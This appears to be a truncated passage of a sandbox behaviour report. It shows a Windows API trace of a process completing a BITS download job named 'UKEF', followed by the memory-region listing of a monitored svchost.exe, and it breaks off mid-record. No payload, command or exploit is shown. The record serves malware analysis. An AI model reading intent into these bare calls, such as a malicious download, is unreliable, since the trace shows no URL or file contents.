MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0076.925] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0076.925] TranslateMessage (lpMsg=0x1efa28) returned 0 [0076.925] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0076.925] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0076.925] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0076.945] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0076.945] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0076.947] IBackgroundCopyCallback:JobTransferred (This=0x263c30, pJob=0x263d18) returned 0x0 [0076.947] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0076.948] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eb558 | out: pVal=0x1eb558) returned 0x0 [0076.949] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0076.950] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eb560 | out: pVal=0x1eb560) returned 0x0 [0076.950] CoTaskMemFree (pv=0x0) [0076.951] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eb568 | out: pVal=0x1eb568*="UKEF") returned 0x0 [0076.951] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb490 | out: lpConsoleScreenBufferInfo=0x1eb490) returned 1 [0076.952] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eb4c8 | out: lpNumberOfCharsWritten=0x1eb4c8) returned 1 [0076.952] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eb4c8 | out: lpNumberOfAttrsWritten=0x1eb4c8) returned 1 [0076.952] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0076.952] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.953] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0xa) returned 1 [0076.953] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.953] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x5) returned 1 [0076.953] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.954] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.954] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x7) returned 1 [0076.954] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.954] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.954] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x8) returned 1 [0076.955] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.955] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.955] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x8) returned 1 [0076.955] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.955] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.956] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0xd) returned 1 [0076.956] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.956] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0xa) returned 1 [0076.956] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.957] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x6) returned 1 [0076.957] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.957] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x8) returned 1 [0076.957] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.958] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eb4a8 | out: _Buffer="1") returned 1 [0076.958] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eb4a8 | out: _Buffer="1") returned 1 [0076.958] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.958] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x5) returned 1 [0076.958] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.958] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.958] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x8) returned 1 [0076.959] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.959] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eb4a8 | out: _Buffer="196608") returned 6 [0076.959] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eb4a8 | out: _Buffer="196608") returned 6 [0076.959] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eb4a8 | out: _Buffer="100") returned 3 [0076.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb480 | out: lpConsoleScreenBufferInfo=0x1eb480) returned 1 [0076.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x1eb4c0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb4c0*=0x16) returned 1 [0076.959] CoTaskMemFree (pv=0x276f30) [0076.959] IBackgroundCopyJob:Complete (This=0x263b58) returned 0x0 [0076.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb490 | out: lpConsoleScreenBufferInfo=0x1eb490) returned 1 [0076.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x2) returned 1 [0076.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eb450 | out: lpConsoleScreenBufferInfo=0x1eb450) returned 1 [0076.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1eb490, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eb490*=0x14) returned 1 [0076.966] GetCurrentThreadId () returned 0xa94 [0076.966] PostThreadMessageW (idThread=0xa94, Msg=0x401, wParam=0x0, lParam=0x0) returned 1 [0076.967] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0076.967] IUnknown:Release (This=0x263b58) returned 0x1 [0076.967] IUnknown:Release (This=0x263a08) returned 0x0 [0076.967] CoUninitialize () [0076.971] IUnknown:Release (This=0x263c30) returned 0x2 [0076.971] IUnknown:Release (This=0x263c30) returned 0x1 [0076.971] IUnknown:Release (This=0x263c30) returned 0x0 [0076.971] IUnknown:Release (This=0x263b58) returned 0x0 [0076.971] CoTaskMemFree (pv=0x263c30) [0076.972] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0076.972] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.973] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0076.973] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.973] CloseHandle (hObject=0x84) returned 1 [0076.973] exit (_Code=0) Thread: id = 24 os_tid = 0xa98 Thread: id = 25 os_tid = 0xa9c Thread: id = 26 os_tid = 0xaa0 Thread: id = 27 os_tid = 0xaa4 Thread: id = 76 os_tid = 0xb2c Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7c1a000" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xa90" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bad4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 693 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 694 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 695 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 696 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 697 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 698 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 699 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 700 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 701 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 702 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 703 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 704 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 705 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 706 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 707 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 708 start_va = 0x1d0000 end_va = 0x1d3fff entry_point = 0x1d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 709 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 710 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 711 start_va = 0x200000 end_va = 0x22ffff entry_point = 0x200000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 712 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 713 start_va = 0x240000 end_va = 0x245fff entry_point = 0x240000 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 714 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 715 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 716 start_va = 0x450000 end_va = 0x5d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 717 start_va = 0x5e0000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 718 start_va = 0x770000 end_va = 0x82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 719 start_va = 0x830000 end_va = 0xc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 720 start_va = 0xc30000 end_va = 0xc95fff entry_point = 0xc30000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 721 start_va = 0xca0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 722 start_va = 0xd20000 end_va = 0xd3bfff entry_point = 0xd20000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 723 start_va = 0xd40000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 724 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 725 start_va = 0xdd0000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 726 start_va = 0xe50000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 727 start_va = 0xe60000 end_va = 0xe60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 728 start_va = 0xec0000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 729 start_va = 0xf60000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 730 start_va = 0xff0000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 731 start_va = 0x1070000 end_va = 0x133efff entry_point = 0x1070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 732 start_va = 0x1340000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 733 start_va = 0x13d0000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 734 start_va = 0x1460000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 735 start_va = 0x14e0000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 736 start_va = 0x15a0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 737 start_va = 0x1650000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 738 start_va = 0x16d0000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 739 start_va = 0x1750000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 740 start_va = 0x17d0000 end_va = 0x184ffff entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 741 start_va = 0x18a0000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 742 start_va = 0x1980000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 743 start_va = 0x1a20000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 744 start_va = 0x1ae0000 end_va = 0x1b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 745 start_va = 0x1bc0000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 746 start_va = 0x1c80000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 747 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 748 start_va = 0x1d80000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 749 start_va = 0x1e00000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 750 start_va = 0x1f70000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 751 start_va = 0x2020000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 752 start_va = 0x20b0000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 753 start_va = 0x2160000 end_va = 0x21dffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 754 start_va = 0x21f0000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 755 start_va = 0x2280000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 756 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 757 start_va = 0x23d0000 end_va = 0x2712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023d0000" filename = "" Region: id = 758 start_va = 0x2720000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 759 start_va = 0x2820000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 760 start_va = 0x28e0000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 761 start_va = 0x2960000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 762 start_va = 0x2a60000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 763 start_va = 0x2b80000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 764 start_va = 0x2c60000 end_va = 0x2cdffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 765 start_va = 0x2d10000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 766 start_va = 0x2e00000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 767 start_va = 0x2ea0000 end_va = 0x2f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 768 start_va = 0x2f50000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 769 start_va = 0x2fe0000 end_va = 0x305ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 770 start_va = 0x3060000 end_va = 0x315ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003060000" filename = "" Region: id = 771 start_va = 0x31a0000 end_va = 0x321ffff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 772 start_va = 0x3230000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 773 start_va = 0x33a0000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 774 start_va = 0x33b0000 end_va = 0x34affff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 775 start_va = 0x34c0000 end_va = 0x353ffff entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 776 start_va = 0x3540000 end_va = 0x363ffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 777 start_va = 0x36b0000 end_va = 0x36bffff entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 778 start_va = 0x36c0000 end_va = 0x37bffff entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 779 start_va = 0x3840000 end_va = 0x38bffff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 780 start_va = 0x3950000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 781 start_va = 0x3a20000 end_va = 0x3a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 782 start_va = 0x3af0000 end_va = 0x3b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 783 start_va = 0x3c00000 end_va = 0x3c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 784 start_va = 0x3d60000 end_va = 0x3ddffff entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 785 start_va = 0x3de0000 end_va = 0x3fdffff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 786 start_va = 0x4060000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 787 start_va = 0x40e0000 end_va = 0x415ffff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 788 start_va = 0x4300000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 789 start_va = 0x43c0000 end_va = 0x443ffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 790 start_va = 0x45d0000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 791 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 792 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 793 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 794 start_va 